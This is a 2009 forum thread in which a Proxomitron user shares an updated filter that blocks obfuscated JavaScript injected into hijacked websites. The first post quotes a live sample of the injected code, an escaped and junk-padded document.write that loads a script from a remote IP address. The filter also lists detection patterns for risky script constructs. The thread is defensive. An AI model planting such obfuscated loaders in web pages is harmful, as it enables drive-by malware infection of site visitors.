The Un-Official Proxomitron Forum
Bugfix + 0day: JS Kill - Specific Escaped Code - Printable Version

+- The Un-Official Proxomitron Forum (https://www.prxbx.com/forums)
+-- Forum: Proxomitron Config Sets (/forumdisplay.php?fid=43)
+--- Forum: Sidki (/forumdisplay.php?fid=44)
+--- Thread: Bugfix + 0day: JS Kill - Specific Escaped Code (/showthread.php?tid=1333)



Bugfix + 0day: JS Kill - Specific Escaped Code - sidki3003 - Apr. 01, 2009 09:25 PM

Two changes:
- Global variable "a" wasn't always reset, resulting in odd (but harmless) secondary effects.
- I came across two sites today containing code (pointing to a Latvian server) like:
Code:
document.write(unescape('%3Cscrz7RiKQpt%20srK7c%3D%2F%2F94%2E247cMV%2E6xE2Hsh%2E1z7R93N5z7R%2FfIejq3Nuery%2Ejz7RsK7%3E3N%3C%2FsfIecriz7Rpt3N%3E').replace(/K7|fIe|cMV|z7R|KQ|Hsh|6xE|3N|NK/g,""));


If the new subroutine matches, you'll get a Log-Rare entry like:
Code:
WEB JS_Escape     replace     http://my-hijacked-site.com/

Let me know of any false positives.


Code:
[Patterns]
Name = "JS Kill: Specific Escaped Code     9.04.01 [sd] (d.2)"
Active = TRUE
URL = "($TYPE(htm)|$TYPE(js)|$TYPE(vbs))(^$TST(keyword=*.(a_js|a_jsmeth).*))"
Limit = 7800
Match = "\= \" (%3C$TST(script=[1s]*)((%73%63|%53%43)\4|)("
        "*\"$SET(1==\"\")$SET(5= (string))|$SET(1==\"\"; var prxBlocked=\")$SET(5= (string, large))*"
        ")&&(^*</script)\6)"
        "|\= \' (%3C$TST(script=[1s]*)((%73%63|%53%43)\4|)("
        "*\'$SET(1==\'\')$SET(5= (string))|$SET(1==\'\'; var prxBlocked=\')$SET(5= (string, large))*"
        ")&&(^*</script)\6)"
        "|unescape \($TST(script=[1s]*) ("
        "$INEST(\(,(")\2(^%") (%3C(%73%63|%53%43)\4*|\6),\))\)"
        "((^ [,;)])(.(replace)\4$SET(1=\2\2.replace)|)|$SET(1=\2\2))"
        "|\\(")\2 (%3C(%73%63|%53%43)\4*|\6)\\$TST(\2) \)((^ [,;)])|$SET(1=\\\2\\\2))$SET(5= (2nd level))"
        "|(\\+")\2(^%")$SET(1=PrxVoidF\(\2Blocked: $GET(a)\2, \2\4\6)$SET(5= (large))"
        " (^*</script)(%3C(%73%63|%53%43)\4\6|\6)"
        ")"
        "&"
        "$TST(\4=replace$SET(a=\4)|$SET(a=script)*)"
        "|$TST($UESC(\6)=*("
        ".(createControlRange|FileSystemObject|fromCharCode)\4$SET(a=\4)"
        "|<(iframe$SET(a=iframe)|applet$SET(a=applet)|object[^>]++data=$SET(a=object data))"
        "|c("
        "reateObject$SET(a=CreateObject)"
        "|l(sid( \(" {| : {+|=" {+)|assid=" {+)(^D27CDB6E-AE6D-11cf-96B8-444553540000|[^0-9a-f])"
        "$LST(ClassIDs)$SET(a=ClsID: \9)"
        ")"
        "|ms-its:$SET(a=ms-its)"
        "|src=$TST(flag=*.adurl:1.*)(\\(")\3 ((^\\$TST(\3))*\\$TST(\3)&&$LST(AdList)$SET(a=src: \9)*)|"
        "$AV( ?*& $LST(AdList)$SET(a=src: \9)))"
        "|unescape(^(^ \())$SET(a=unescape)"
        "|VBScript$SET(a=VBScript)"
        ")*)"
        "&"
        "($TYPE(htm)$SET(eHits=$GET(eHits)"
        "%3Cspan class=%22ProxFly-Span%22>$GET(mHead) JS Escape:%3C/span>"
        "      $ESC($GET(a))\5%3Cbr class=%22ProxFly-Br%22 />"
        ")|)"
        "($TST(volat=*.log:2*)$ADDLST(Log-Main,[$DTM(d T)]\tWEB JS_Escape\5 \t$GET(a) \t\u)|)"
        "($TST(volat=*.log:[12]c.*)$ADDLST(Log-Rare,WEB JS_Escape\5 \t$GET(a) \t\u)|)"
Replace = "\1$SET(a=)"



RE: Bugfix + 0day: JS Kill - Specific Escaped Code - bugger - Apr. 02, 2009 01:15 AM

where do i put the filter?

under JS intercept?


RE: Bugfix + 0day: JS Kill - Specific Escaped Code - sidki3003 - Apr. 02, 2009 01:34 AM

Dang, as mentioned above, it's an update. Wink
So, look for the previous version, untick it, place the new version above it, save the config.


RE: Bugfix + 0day: JS Kill - Specific Escaped Code - bugger - Apr. 02, 2009 02:31 AM

oh bugger. My apology!